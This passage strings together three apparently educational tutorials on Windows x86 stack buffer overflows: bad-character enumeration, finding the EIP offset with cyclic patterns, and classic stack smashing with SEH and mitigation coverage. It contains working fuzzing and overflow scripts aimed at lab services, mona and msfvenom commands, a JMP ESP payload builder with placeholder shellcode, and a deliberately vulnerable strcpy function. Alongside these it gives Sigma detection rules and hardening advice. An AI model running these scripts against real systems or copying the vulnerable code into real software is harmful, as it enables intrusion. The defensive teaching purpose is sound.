A distinct constraint class: some applications convert input via MultiByteToWideChar() (Win32) or mbstowcs() (CRT), expanding each byte to a wide character and effectively inserting a null after every byte. This breaks shellcode alignment entirely — it is transformation, not stripping.

# You send:        \x41\x42
# Memory shows:    \x41\x00\x42\x00   <- every odd byte zeroed
sent     = b"\x41\x42"
observed = b"\x41\x00\x42\x00"        # Unicode expansion in the debugger

A naive \x01–\xFF array will look catastrophically corrupted under this transformation because every byte appears null-padded. The classical mitigation is Venetian shellcode — manually constructed so that the injected null bytes become harmless padding instructions, letting the real opcodes survive expansion. Identify these buffers by spotting the regular \x00 interleave in the hex dump.

11. Common Attacker Techniques

Technique	Description
Bad-char enumeration	Inject `\x01`–`\xFF`, diff memory, identify forbidden bytes
Shellcode encoding	Re-encode with `shikata_ga_nai` / `call4_dword_xor` to avoid bad bytes
Alphanumeric shellcode	`alpha_mixed` / Alpha2 for printable-only constraints
Jump substitution	Replace `\xEB` with `JE/JNE` pairs or near `JMP`
Venetian shellcode	Survive Unicode expansion in wide-character buffers
Egghunter staging	Small finder stub locating a larger payload in tight buffers

These are pre-exploitation tradecraft — they enable shellcode delivery but execution and payload behavior are what generate detectable telemetry.

12. Defensive Strategies & Detection

Bad-char testing itself is quiet, but the encoded shellcode it produces is loud once it executes from unbacked memory.

Event ID	Name	Relevance
`1`	Process Creation	Frameworks (Metasploit, Empire) launching payloads
`3`	Network Connection	Outbound C2 from an exploited process
`8`	CreateRemoteThread	Post-exploitation thread injection
`10`	ProcessAccess	Cross-process open by injected payload
`11`	FileCreate	Shellcode or payload dropped to disk

Sysmon Event ID 10 (ProcessAccess) is the primary signal. Shellcode executing from anonymous stack or heap memory produces a CallTrace containing UNKNOWN frames — code with no backing image on disk.

title: Shellcode Injection via Suspicious Process Access
logsource:
  category: process_access
  product: windows
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
level: high

Additional telemetry and hardening:

ETW — subscribe to Microsoft-Windows-Threat-Intelligence (ETWTI) to observe injection and memory manipulation; Microsoft-Windows-Security-Auditing for process audit events.
Audit Process Creation (Detailed Tracking) → Security Event 4688 with command-line logging captures framework invocations.
WAF / network — flag URI patterns carrying buffer-overflow payloads; a burst of access-violation or segfault alerts in a short window signals active exploitation attempts.
Compiler mitigations — /GS, /SAFESEH, /DYNAMICBASE, /NXCOMPAT raise the exploitation bar.
Input validation — allowlist legal characters at the boundary; explicitly reject \x00, \x0A, \x0D.
WDEG — enforce DEP and CFG per-process via Set-ProcessMitigation.
Memory integrity — flag executable pages not backed by a known on-disk image.
Deploy Sysmon with a community baseline (SwiftOnSecurity, olafhartong sysmon-modular) to ensure EID 10 captures CallTrace.

Hierarchy diagram mapping an exploit attempt to four detection and mitigation layers: network WAF, OS mitigations like DEP and CFG, Sysmon Event ID 10 with unknown CallTrace, ETWTI injection telemetry, and Security Event 4688 process creation logging — Defence-in-depth layers each intercept exploitation at a different stage — encoded shellcode evades transport filters but generates unmistakable runtime telemetry.

13. Tools for Bad-Character Analysis

Tool	Description	Link
Immunity Debugger	Crash analysis, ESP dump inspection	immunityinc.com
mona.py	Bytearray generation and memory comparison	github.com/corelan
WinDbg	Opcode/gadget inspection, memory diffing	microsoft.com
msfvenom	Shellcode generation and encoding (`-b`)	offsec.com
Alpha2	Standalone alphanumeric shellcode encoder	github.com
x64dbg	User-mode debugging and patching	x64dbg.com
Ghidra	Static opcode/disassembly analysis	ghidra-sre.org
Volatility	Memory forensics, unbacked code regions	volatilityfoundation.org

14. MITRE ATT&CK Mapping

Bad-char testing and shellcode crafting are pre-exploitation tradecraft with no standalone technique ID — they enable the techniques below.

Technique	MITRE ID	Detection
Exploitation for Client Execution	`T1203`	Process crash bursts, EID `1` framework launches
Exploit Public-Facing Application	`T1190`	WAF anomalies, service access violations
Exploitation for Privilege Escalation	`T1068`	Local overflow → elevated process behavior
Obfuscated Files or Information	`T1027`	Encoder signatures (shikata/alpha) on disk/wire
Process Injection	`T1055`	Sysmon EID `8`/`10`, `UNKNOWN` in `CallTrace`

Summary

Bad characters are application-defined bytes that corrupt, truncate, or transform shellcode before it reaches EIP — you must enumerate them empirically, never assume.
\x00 is always bad in string-based overflows because CRT functions like strcpy and strlen treat it as the terminator; sockets pass it but downstream string APIs still die on it.
Enumerate with a \x01–\xFF byte array, diff memory using !mona compare, and remember only the first byte of a corrupted run is confirmed bad.
Adapt with msfvenom -b encoding (shikata_ga_nai, falling back to call4_dword_xor or alpha_mixed), jump-opcode substitution, and Venetian shellcode for Unicode buffers.
Detect the resulting payloads via Sysmon Event ID 10 with UNKNOWN CallTrace frames, ETWTI injection telemetry, and process-creation auditing (4688).

References

Finding the EIP Offset: Pattern Creation and Cyclic Patterns

Objective: Understand how to determine the exact EIP overwrite offset in a classic x86 stack-based buffer overflow by sending a cyclic (De Bruijn-derived) pattern, reading the value loaded into EIP at crash time, and calculating the precise byte distance from the buffer’s start to the saved return address — a repeatable, tool-agnostic workflow for authorized lab use.

1. Prerequisites and Lab Setup

This workflow assumes an isolated, authorized lab VM — never a production host. The classic offset-finding exercise targets a purpose-built vulnerable service such as vulnserver.exe or brainpan.exe, attached to a debugger.

You will need:

Component	Role
Immunity Debugger	Attach to the target process and read register state at crash time.
`mona.py`	Pattern generation and offset search inside Immunity.
Kali + Metasploit	`msf-pattern_create` / `msf-pattern_offset` wrappers.
Python 3 (+ pwntools)	Scripted fuzzing, pattern delivery, and `cyclic()` math.

Attach Immunity to the running service (File → Attach), press F9 to resume, then drive input from your Python script across the network. Configure mona‘s working folder first:

!mona config -set workingfolder c:\mona\%p

2. The x86 Stack Frame: Why EIP Is the Target

EIP (Extended Instruction Pointer) is the 32-bit register holding the address of the next instruction. On function return, the ret instruction pops the saved return address off the stack into EIP. If you can overwrite that saved value, you control where execution flows next.

On a standard MSVC/GCC x86 cdecl frame, the layout is:

[  local buffer (N bytes)  ]   <- lower address, ESP near here on entry
[  saved EBP (4 bytes)     ]
[  saved EIP (4 bytes)     ]   <- overwrite target
[  function arguments      ]   <- higher address

The saved EIP sits above the saved EBP in the stack image. The offset is the byte distance from byte 0 of your input buffer to the first byte of saved EIP. ESP matters too: after ret, ESP advances past the popped return address and typically points directly into your attacker-controlled buffer region — the basis for later JMP ESP stages.

Diagram of x86 cdecl stack frame showing input buffer overflowing through local variables and saved EBP into the saved EIP return address, with ESP position after ret indicated — The saved EIP sits just above the saved EBP — overflowing the input buffer upward overwrites it and redirects execution.

3. From Fuzzing to Approximate Crash Size

The prior stage — fuzzing — delivers progressively larger buffers of A bytes (\x41) until the service dies. When the debugger shows EIP = 41414141, the saved return address has been fully overwritten with As. That confirms EIP control but tells you nothing about where in the buffer EIP lands.

import socket, time

ip, port = "192.168.56.10", 9999
size = 100
while True:
    try:
        with socket.create_connection((ip, port), timeout=5) as s:
            buf = b"A" * size
            s.send(b"TRUN /.:/" + buf)   # protocol-specific prefix
            print(f"[*] Sent {size} bytes")
            size += 100
            time.sleep(1)
    except Exception:
        print(f"[!] Crash near {size} bytes")
        break

Round the crash size up to a clean number — say 2000 bytes. That value becomes the pattern length.

4. The Mathematics of Cyclic Patterns

EIP = 41414141 is ambiguous because every byte is identical. The fix is a cyclic pattern: a string in which every fixed-length substring appears exactly once. Find which substring landed in EIP, and you have the offset.

Concept	Detail
De Bruijn sequence	A sequence where every possible subsequence of a fixed length appears exactly once. This uniqueness is what makes offset lookup deterministic.
Why it works	The overwriting bytes are popped into EIP on `ret`. Because each 4-byte window is unique, the EIP value maps to exactly one position in the input.
Metasploit variant	Metasploit patterns use a different algorithm than true De Bruijn but serve the same purpose, drawing from uppercase letters, lowercase letters, and digits.
3-char uniqueness	`pattern_create` produces a string where every three-character substring is unique: `Aa0Aa1Aa2Aa3Aa4...`.

pwntools cyclic() generates a true De Bruijn sequence; msf-pattern_create uses the alphabet-based approach. Both yield a unique mapping you can query.

Flow diagram showing the complete cyclic pattern offset-finding workflow from initial fuzzing crash through pattern generation, delivery, EIP value capture, offset calculation, and BBBB verification — A De Bruijn cyclic pattern makes every 4-byte window unique, collapsing the offset problem to a single deterministic lookup.

5. Generating the Pattern: Three Tool Paths

Generate a pattern equal to (or slightly larger than) the crash size. The -l flag is length; the -q flag (next section) is the query value.

Metasploit (Bash):

# Generate a 2000-byte non-repeating pattern
msf-pattern_create -l 2000
# Or the script directly:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000

mona.py (Immunity command bar):

!mona pc 2000

pwntools (Python 3):

from pwn import *
pattern = cyclic(2000)
print(pattern)

Tip: Generate a pattern 400 bytes larger than the crash buffer to also reveal whether shellcode space exists immediately after the EIP overwrite.

6. Sending the Pattern and Capturing the EIP Value

Replace the A buffer in your fuzzing script with the generated pattern, reattach Immunity, and reproduce the crash.

import socket

pattern = b"Aa0Aa1Aa2Aa3Aa4..."   # paste msf-pattern_create -l 2000 output
ip, port = "192.168.56.10", 9999

with socket.create_connection((ip, port)) as s:
    s.send(b"TRUN /.:/" + pattern)

When the process faults, read the 4-byte EIP value from Immunity’s register panel — for example 6F43396E.

Little-endian note: Values are written to the stack least-significant-byte first. A debugger may display the register as 6F43396E. Tools like pattern_offset handle endianness internally, so pass the displayed value as-is. A manual ASCII lookup, however, requires reversal: 6F43396E → 6E39436F → n9Co.

7. Calculating the Exact Offset

Feed the EIP value into any of the three tools. All return the same byte distance.

Metasploit (Bash):

# -q is the query switch; pass the EIP value from the debugger
msf-pattern_offset -l 2000 -q 6F43396E
# Output:
# [*] Exact match at offset 1978

mona.py (Immunity): findmsp searches every register and the stack against the pattern.

!mona findmsp -distance 2000

Read the log line:

EIP contains normal pattern : ... (offset 1978)

(!mona po 6F43396E performs the same lookup by hex value.)

pwntools (Python 3): cyclic_find accepts the packed 4-byte value.

from pwn import *
offset = cyclic_find(p32(0x6161616c))   # value read from EIP
print(offset)                            # -> integer byte offset

gdb-peda‘s pattern_search reports all three at once on Linux targets — e.g. EIP+0 found at offset: 1040 and [ESP] --> offset 1044 — useful for spotting where ESP lands relative to EIP.

8. Verifying EIP Control

Never trust a calculated offset blindly. Confirm it by overwriting EIP with a known marker. Set payload to empty and retn to "BBBB":

import socket

prefix   = b"TRUN /.:/"
offset   = 1978
overflow = b"A" * offset
retn     = b"BBBB"          # 0x42424242
payload  = b""              # no payload yet — verification only

buf = prefix + overflow + retn + payload

with socket.create_connection(("192.168.56.10", 9999)) as s:
    s.send(buf)

Reload the app in Immunity and re-send. If the offset is correct, EIP shows 42424242 — the hex of “BBBB”. You now control execution flow exactly. Confirm ESP also points into your buffer; that location holds the bytes that follow retn and becomes your future code-redirect landing zone.

The conceptual stack image after the overwrite:

[ AAAA AAAA ... AAAA ]   offset bytes filling buffer + saved EBP
[ BBBB ]                 saved EIP = 0x42424242  (controlled)
[ CCCC ... ]             ESP region (future shellcode space)

Diagram of stack after controlled EIP overwrite showing padding bytes up to the exact offset, BBBB value in saved EIP slot, and ESP pointing to the attacker-controlled region immediately after — EIP showing 0x42424242 confirms the offset is exact; ESP now points into your buffer, establishing the foundation for a JMP ESP redirect.

9. Common Pitfalls and Edge Cases

Pattern shorter than the real offset: EIP holds bytes from beyond your pattern; the offset tool returns no match. Regenerate longer.
Bad characters: Bytes like \x00, \x0a, \x0d can truncate or corrupt the pattern mid-stream, shifting EIP unpredictably. Bad-char analysis is a separate stage.
Modern mitigations: ASLR and DEP/NX invalidate the naive EIP→ESP→shellcode chain on hardened targets. The offset still exists, but exploitation requires bypasses (covered in later tutorials).
SEH-based overflows: When the buffer overruns the Structured Exception Handler instead of the saved return address, EIP may not show pattern bytes directly — !mona findmsp will instead report the offset to the SEH/nSEH records.

10. Common Attacker Techniques

Offset discovery is a development sub-step that feeds the techniques below.

Technique	Description
Stack buffer overflow	Overrun a fixed local buffer to overwrite the saved return address.
Cyclic pattern offset finding	Deterministically locate the EIP overwrite distance, as taught here.
EIP redirection via `JMP ESP`	Once the offset is known, replace `retn` with the address of a `JMP/CALL ESP` gadget.
SEH overwrite	Variant overflow that hijacks the exception handler chain instead of `ret`.

11. Defensive Strategies and Detection

Detection splits into two contexts: catching exploitation attempts against a service, and catching the crash-loop behaviour of fuzzing/pattern delivery.

Crash and process telemetry:

Application Error — Event ID 1000 (Application log): logged on 0xC0000005 (Access Violation) when EIP corruption kills the process; the faulting address is the pattern value (e.g. 0x41307241).
Windows Error Reporting — Event ID 1001: WER bucket data, faulting instruction pointer, and dump path for post-crash forensics.
Sysmon Event ID 3 (Network Connection): repeated high-rate TCP connections to a single service port during fuzzing and pattern delivery are anomalous — watch DestinationPort and SourceIp.
Sysmon Event ID 1 (Process Create): child processes spawned if the overflow reaches code execution — inspect CommandLine, ParentImage, IntegrityLevel.

ETW providers: Microsoft-Windows-WER-SystemErrorReporting emits access-violation crash events; Microsoft-Windows-Kernel-Process reveals abnormal crash-and-restart loops via process start/stop events. Forward both to a SIEM.

A repeated-crash detection sketch (illustrative):

title: Repeated Application Crash Loop (Possible Buffer Overflow Fuzzing)
logsource:
  product: windows
  service: application
detection:
  selection:
    EventID: 1000
    ExceptionCode: '0xc0000005'   # Access Violation
  timeframe: 1m
  condition: selection | count() > 5   # repeated crashes = fuzzing indicator
level: high

Hardening checklist (raises the bar from “find the bug” to “bypass every mitigation”):

Compile with /GS stack security cookies — a mismatch triggers __security_check_cookie() and terminates before ret.
Enable DEP/NX system-wide: bcdedit /set nx AlwaysOn.
Enable ASLR: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\MoveImages = 1.
Compile with Control Flow Guard: /guard:cf.
Link with SafeSEH (/SAFESEH) to block SEH overwrites on x86.
Replace unbounded strcpy, gets, scanf("%s", ...) with strcpy_s, strncpy_s, gets_s.
Run Application Verifier with heap and stack checks during development.

These map to MITRE mitigation M1050 — Exploit Protection.

12. Tools for Offset Analysis

Tool	Description	Link
`msf-pattern_create` / `pattern_create.rb`	Generate a non-repeating pattern of length `-l`.	metasploit.com
`msf-pattern_offset` / `pattern_offset.rb`	Query offset with `-q <EIP_HEX>`.	metasploit.com
mona.py	`!mona pc`, `!mona findmsp`, `!mona po` inside Immunity.	github.com
Immunity Debugger	Attach, reproduce crash, read EIP/ESP.	immunityinc.com
pwntools	`cyclic()` / `cyclic_find()` De Bruijn math.	github.com
GDB + PEDA	`pattern_search` reports EBP/EIP/ESP offsets.	github.com

13. MITRE ATT&CK Mapping

Offset finding is a pre-exploitation development sub-step with no dedicated technique ID; it supports the techniques below.

Technique	MITRE ID	Detection
Exploitation for Client Execution	`T1203`	Crash telemetry (Event ID 1000), anomalous child processes (Sysmon ID 1).
Exploitation for Privilege Escalation	`T1068`	Access-violation crashes in privileged services; WER buckets.
Exploit Public-Facing Application	`T1190`	High-rate TCP to a service port (Sysmon ID 3); crash loops.
Exploitation for Defense Evasion	`T1211`	Memory-corruption indicators; EDR memory hooks.
Exploit Protection (Mitigation)	`M1050`	DEP, ASLR, CFG, `/GS`, SafeSEH.

Summary

The EIP offset is the exact byte distance from your buffer’s start to the saved return address — and a cyclic pattern finds it deterministically.
A De Bruijn / Metasploit pattern makes every fixed-length window unique, so the value popped into EIP maps to a single position.
Generate with msf-pattern_create, !mona pc, or cyclic(); resolve with msf-pattern_offset -q, !mona findmsp, or cyclic_find().
Verify by overwriting EIP with "BBBB" and confirming EIP = 42424242; remember little-endian display order.
Defenders catch the activity via Event ID 1000 (0xC0000005) crash loops and Sysmon Event ID 3 connection floods; M1050 controls (DEP, ASLR, CFG, /GS) raise the exploitation bar dramatically.

References

Classic Stack Buffer Overflow: Smashing the Stack on Windows

Objective: Understand how a classic stack-based buffer overflow corrupts a Windows x86 call frame, hijacks the saved EIP, and redirects execution through a JMP ESP trampoline — and how /GS, SafeSEH, SEHOP, DEP, and ASLR defeat or complicate it, so you can detect and defend against this vulnerability class in authorized lab work.

1. Windows Memory Layout Primer

Every Windows process runs inside a private virtual address space. On x86 (32-bit), that space spans 0x00000000–0x7FFFFFFF for user mode. The stack grows downward (high to low addresses) and stores function call frames; the heap grows upward and serves dynamic allocations.

The CPU tracks two stack-relevant registers and one execution register:

ESP — stack pointer, the current top of stack.
EBP — base/frame pointer, anchors the current frame.
EIP — instruction pointer, the address of the next instruction. This is the attacker’s target.

A CALL instruction pushes the return address (the next EIP) onto the stack and jumps to the target. The matching RET pops that saved address back into EIP. If an attacker overwrites the saved return address on the stack, RET transfers control wherever they choose.

x86 is little-endian: the address 0x625011AF is written in the payload as the byte sequence \xAF\x11\x50\x62. This byte ordering matters for every address you place into an exploit buffer.

2. Anatomy of a Stack Frame

A standard cdecl/stdcall function frame is built by the prologue and torn down by the epilogue. Laid out high → low address:

Stack Slot	Description
Function arguments	Pushed by caller before `CALL`
Saved `EIP` (return address)	Pushed implicitly by the `CALL` instruction
Saved `EBP`	Pushed by callee prologue (`PUSH EBP`)
`/GS` stack cookie (if present)	Inserted between locals and saved EBP/EIP
Local variables / buffers	Allocated by `SUB ESP, N`
← `ESP` (stack top)	Grows downward

The prologue and epilogue, with the /GS cookie check shown, look like this:

; --- Prologue ---
push    ebp                 ; save caller frame pointer
mov     ebp, esp            ; establish new frame
sub     esp, 0x40           ; allocate 64 bytes of locals
mov     eax, [__security_cookie]
xor     eax, ebp            ; cookie ^= EBP (frame-tied canary)
mov     [ebp-4], eax        ; store cookie above locals

; --- Epilogue ---
mov     ecx, [ebp-4]
xor     ecx, ebp
call    __security_check_cookie  ; compare vs master; abort on mismatch
mov     esp, ebp
pop     ebp                 ; restore caller frame pointer
ret                         ; pop saved EIP into instruction pointer

Reading this frame live in WinDbg or x64dbg — inspecting ESP, EBP, and the bytes between locals and the saved return address — is the first skill of exploit development.

Diagram of an x86 Windows stack frame showing the order from high to low address: function arguments, saved return EIP, saved EBP, GS cookie, local buffer, and ESP — A standard x86 cdecl stack frame — the saved return EIP sits just above EBP, making it the prime overwrite target when a local buffer overflows upward.

3. The Overflow: Why Bounds Checks Matter

The root cause is always the same: a copy operation that writes more bytes into a fixed-size stack buffer than the buffer holds. The classic offenders are CRT functions that perform no bounds checking.

Identifier	What it does
`strcpy`, `strcat`, `gets`, `sprintf`, `scanf`	Unsafe CRT functions with no bounds checking — classic root causes
`memcpy(dst, src, count)`	Copies `count` bytes regardless of `dst` size; dangerous when `count` is attacker-controlled

Here is the canonical vulnerable pattern defenders must recognize in code review:

#include <string.h>

// DELIBERATELY VULNERABLE — lab use only.
void handle_request(char *attacker_input) {
    char buffer[64];            // fixed 64-byte stack buffer
    strcpy(buffer, attacker_input);  // no length check — overflow
}

When attacker_input exceeds 64 bytes, the copy walks past buffer, overwrites the saved EBP, then the saved EIP. Supply a long run of 0x41 ('A') and the program crashes with an access violation as the CPU tries to execute at EIP = 0x41414141. That controlled crash is proof you own the instruction pointer.

When compiled with MSVC /GS- (cookie disabled), the prologue omits the xor/store and the epilogue omits __security_check_cookie entirely — a linear overflow reaches the return address unobstructed. Diffing the /GS vs /GS- disassembly in a debugger is the clearest way to see the cookie.

4. Exploit Development Methodology on Windows

The classic workflow is a tight loop against an intentionally vulnerable target in an isolated VM:

Fuzz to crash — send increasing-length inputs until the service faults.
Find the offset — send a cyclic (de Bruijn) pattern, read the value in EIP at crash, compute the exact distance to the return address.
Confirm EIP control — overwrite with a known marker (0x42424242) and verify.
Enumerate bad characters — find bytes the protocol mangles (\x00, \x0a, \x0d are common).
Find a trampoline — locate JMP ESP in a non-ASLR module.
Build the payload — padding + trampoline address + NOP sled + shellcode.

A minimal network fuzzer:

import socket, time

target = ("192.168.56.20", 9999)
size = 100
while size < 4000:
    try:
        s = socket.socket()
        s.connect(target)
        buf = b"TRUN /.:/" + b"A" * size      # protocol prefix + payload
        s.send(buf)
        s.close()
        print(f"[+] sent {size} bytes")
        size += 200
        time.sleep(1)
    except Exception:
        print(f"[!] crashed at ~{size} bytes")
        break

Offset discovery with a cyclic pattern (generated by pwntools or !mona pattern_create):

from pwn import cyclic, cyclic_find

pattern = cyclic(3000)                 # de Bruijn sequence
# ... send pattern, read EIP from the debugger at crash (e.g. 0x6f43396e) ...
offset = cyclic_find(0x6f43396e)       # exact bytes before saved EIP
print(f"[+] EIP offset = {offset}")

Bad-character enumeration sends the full byte range and diffs it against memory:

badchar_test = bytes(b for b in range(1, 256))   # skip \x00 first
# Send, then in the debugger: d esp  -> compare bytes in memory
# Any byte missing/truncated is a bad char; rebuild excluding it.

The final builder assembles the pieces. Note the placeholder shellcode — generate benign calc-popping shellcode with msfvenom in your own lab; never embed working shellcode in a tutorial:

from pwn import p32

offset    = 2003
jmp_esp   = 0x625011AF          # FF E4 in a non-ASLR module
nop_sled  = b"\x90" * 16
# shellcode = b"[MSFVENOM_OUTPUT_HERE]"  # generated in your lab, -b "\x00\x0a\x0d"
shellcode = b"\x90" * 32         # placeholder

payload = b"A" * offset + p32(jmp_esp) + nop_sled + shellcode

The key opcodes you search modules for:

Opcode bytes	Instruction	Use
`FF E4`	`JMP ESP`	Classic return trampoline
`FF D4`	`CALL ESP`	Equivalent effect
`FF E5`	`JMP EBP`	When EBP points near the buffer
`EB 06`	Short JMP +6	Next-SEH jump-over gadget

Because ESP points at the attacker’s buffer when RET executes, returning into JMP ESP immediately pivots execution into the NOP sled and shellcode.

Flow diagram of the six-step Windows stack overflow exploit development methodology from fuzzing through payload construction — The exploit development loop progresses from controlled crash to precise EIP hijack, terminating in a JMP ESP trampoline payload that pivots into a NOP sled and shellcode.

5. Windows Mitigations Deep-Dive

Modern Windows defaults make the naïve attack above fail. Each mitigation targets a different stage.

Mitigation	Mechanism	Bypass vector (teaching)
`/GS` (stack cookie)	Random DWORD cookie between locals and saved EBP/EIP; checked in epilogue	SEH overwrite before the cookie check; cookie leak
SafeSEH	PE table of valid SEH handlers; loader validates the handler before dispatch	Trampoline in a module not compiled `/SAFESEH`
SEHOP	Validates the SEH chain reaches `FinalExceptionHandler` at dispatch	Chain spoofing; non-opted-in modules
DEP/NX (`/NXCOMPAT`)	Pages are `W^X`; the stack is non-executable	ROP chain (follow-on topic)
ASLR (`/DYNAMICBASE`)	Randomizes image/stack/heap base	Partial overwrites, info leaks (follow-on topic)

/GS computes a program-wide master cookie at startup via __security_init_cookie(), stored in the module’s .data section. The prologue copies it onto the stack between the locals and the saved frame pointer; the epilogue runs __security_check_cookie(), which calls __report_gsfailure() on mismatch. Microsoft shipped /GS in Visual Studio 2003 and enabled it by default in 2005. Variable reordering moves arrays and structs to the highest part of the frame so a linear overflow cannot clobber other locals before reaching the cookie.

The original /GS only protected arrays of 8+ elements with element size 1 or 2; the later GS++ expanded coverage to any array and any struct regardless of size. The critical limitation: /GS does not protect exception handler records. DEP and ASLR are not stack-specific — they do not stop the overflow or the EIP hijack; they make running shellcode far harder.

Hierarchy diagram of Windows stack overflow mitigations including GS cookie, SafeSEH, SEHOP, DEP, and ASLR with compiler versus OS grouping — Windows layers compiler-enforced mitigations (/GS, SafeSEH) with OS-level controls (SEHOP, DEP, ASLR) — each targets a distinct stage of the exploit chain.

6. SEH-Based Overflow (x86)

On x86, Structured Exception Handling chains live on the stack as linked EXCEPTION_REGISTRATION_RECORD nodes:

typedef struct _EXCEPTION_REGISTRATION_RECORD {
    struct _EXCEPTION_REGISTRATION_RECORD *Next;   // next handler in chain
    PEXCEPTION_ROUTINE                     Handler; // SE handler function ptr
} EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD;

When a function uses try/except, this record sits on the stack beside the /GS cookie. If the attacker overflows far enough to overwrite both Next SEH and SE Handler, then triggers an exception before the epilogue runs __security_check_cookie(), the OS dispatches to the attacker-controlled handler — bypassing the cookie entirely.

The standard technique overwrites SE Handler with the address of a POP–POP–RET gadget inside a loaded module. At dispatch, the stack arrangement places a pointer to the Next SEH field where RET lands; POP–POP–RET unwinds two slots and returns into the attacker’s Next SEH value, which is typically a short jump (EB 06) over the handler bytes into the shellcode.

SafeSEH breaks this by validating the handler against the PE’s registered-handler table; attackers respond by sourcing the gadget from a module not built with /SAFESEH. SEHOP (default since Vista SP1) walks the chain to confirm it terminates at FinalExceptionHandler, defeating a naively overwritten chain. On 64-bit, exception data is table-based and no longer stored on the stack, so this primitive does not apply.

Flow diagram showing the SEH-based stack overflow attack chain from buffer overflow through exception dispatch, POP-POP-RET gadget, and short jump into shellcode — Overwriting the SEH record and triggering an exception before the /GS epilogue runs lets attackers bypass the stack cookie entirely via a POP–POP–RET trampoline.

7. Lab Walkthrough: Exploiting an Intentionally Vulnerable Binary

Perform every step against a purpose-built target — VulnServer, brainpan, or a custom binary compiled with /GS- — inside an isolated VM with no network access to production. The two-phase approach makes the mitigations tangible:

No-protections build: Compile with /GS- /NXCOMPAT:NO /DYNAMICBASE:NO. Run the fuzzer (§4), crash the service, find the offset with a cyclic pattern, confirm EIP control, enumerate bad chars, locate JMP ESP with mona.py, and land in a NOP sled.
/GS-only build: Recompile with /GS enabled, replay the same payload, and watch __security_check_cookie detect the corrupted canary and terminate the process via __report_gsfailure() — the same input that worked now dies in the epilogue.

Reference debugger and mona.py commands:

0:000> g                      ; run until crash
0:000> r                      ; read registers — expect EIP = 41414141
0:000> d esp                  ; dump stack at ESP — find your buffer
0:000> !exploitable           ; triage the crash classification
0:000> bp 0x625011AF          ; break on the JMP ESP trampoline

!mona findmsp                          ; locate cyclic pattern, report EIP offset
!mona jmp -r esp -cpb "\x00\x0a\x0d"   ; find JMP ESP excluding bad chars
!mona bytearray -cpb "\x00"            ; generate byte array for badchar diffing

8. Common Attacker Techniques

Technique	Description
Linear stack smash	Overflow a buffer to overwrite saved `EIP` with a `JMP ESP` trampoline
SEH overwrite	Overwrite `Next SEH` + `SE Handler`, trigger an exception to bypass `/GS`
Non-SafeSEH trampoline	Source POP–POP–RET / `JMP ESP` gadgets from modules lacking `/SAFESEH`
Bad-char-safe encoding	Encode shellcode to avoid protocol-mangled bytes (`\x00`, `\x0a`, `\x0d`)
Egghunter / staging	Use a small first-stage to locate or download a larger payload
Post-exploit `VirtualProtect`	Mark injected memory executable to evade software DEP in legacy scenarios

In practice the attacker chains these: a SEH overwrite defeats the cookie, a non-SafeSEH gadget defeats SafeSEH, and a ROP stub built from non-ASLR module gadgets defeats DEP before transferring to shellcode.

9. Defensive Strategies & Detection

Sysmon does not emit a “buffer overflow” event. The crash surfaces through Windows Error Reporting, and the post-exploitation behavior surfaces through Sysmon.

WER Event ID 1000 (Application Error, Application log) — logs the faulting module, ExceptionCode = 0xC0000005 (access violation), faulting offset, and thread ID. A 0xC0000005 at a non-canonical offset in a network-facing service is high-fidelity.
WER Event ID 1001 — records the crash bucket and any captured dump.

Relevant Sysmon events for follow-on activity:

Event ID	Name	Relevance
`1`	Process Creation	Shells/payloads spawned from a crashed service
`3`	Network Connection	Reverse-shell / C2 egress from shellcode
`7`	Image Loaded	Unexpected `ws2_32.dll` load by a non-network service
`8`	CreateRemoteThread	Thread injection by shellcode
`10`	Process Access	Shellcode calling `OpenProcess` on `lsass.exe`
`11`	File Created	Dropped payloads / second-stage binaries
`25`	Process Tampering	Process hollowing following the overflow

Useful ETW providers: Microsoft-Windows-WER-Diag (crash diagnostics), Microsoft-Windows-Security-Mitigations (WDEG/Exploit Guard triggers, in /KernelMode and /UserMode channels), and Microsoft-Windows-Kernel-Process. Enable Audit Process Creation (4688) with command-line logging and Audit Process Termination (4689) to catch crash/restart loops.

A conceptual Sigma rule keying on repeated crashes of a network-facing service:

title: Repeated Application Crash on Network-Facing Service
logsource:
  product: windows
  service: application
detection:
  selection:
    EventID: 1000
    Application|contains: 'vulnservice.exe'
    ExceptionCode: '0xc0000005'
  condition: selection | count() > 3 by Application within 1m
falsepositives:
  - Legitimate software bugs
level: medium
tags:
  - attack.initial_access
  - attack.T1190

Hardening Steps

Force WDEG / Exploit Protection on network-facing services — mandatory DEP, force-ASLR, SEHOP, heap-spray protection via Set-ProcessMitigation.
Build with /GS, /SAFESEH, /DYNAMICBASE, /NXCOMPAT and audit your pipeline for them.
Verify SEHOP — HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel\DisableExceptionChainValidation = 0.
Forward WER Event ID 1000 to the SIEM and alert on repeated crashes of one process.
Use AddressSanitizer (/fsanitize=address, MSVC ≥ VS 2019 16.9) in dev/test to catch OOB writes.
Rate-limit oversized inputs at the WAF/NGFW; alert on crash surges.
Run services least-privilege so successful exploitation yields minimal access.

10. Tools for Stack Overflow Analysis

Tool	Description	Link
WinDbg	Kernel/user debugger; `!exploitable` crash triage	microsoft.com
x64dbg	User-mode debugger for live frame inspection	x64dbg.com
mona.py	Immunity/WinDbg plugin for offsets, trampolines, bad chars	github.com
pwntools	Python exploit-dev framework (`cyclic`, `p32`)	pwntools.com
ROPgadget	Gadget discovery for DEP-bypass chains	github.com
Ghidra	Static disassembly / decompilation for code review	ghidra-sre.org
Sysmon	Endpoint telemetry for post-exploitation behavior	microsoft.com

11. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Exploit Public-Facing Application	`T1190`	WER `EventID 1000` crash bursts; WAF oversized-input alerts
Exploitation for Privilege Escalation	`T1068`	Service running as SYSTEM crashing then spawning children
Exploitation for Client Execution	`T1203`	Client app (parser/player) crash + child process via Sysmon `EventID 1`
Endpoint DoS: Application Exploitation	`T1499.004`	Repeated crash/restart loops (`4689`, WER `1000`)
Exploit Protection (mitigation)	`M1050`	DEP/ASLR/SEHOP/`/GS` enforced via WDEG telemetry

Stack buffer overflow is a vulnerability primitive, not a standalone ATT&CK technique. T1190 and T1068 are the canonical mappings for the adversarial behavior that uses it.

Summary

A classic stack buffer overflow overwrites the saved return address to hijack EIP and pivot execution into attacker-controlled shellcode via a JMP ESP trampoline.
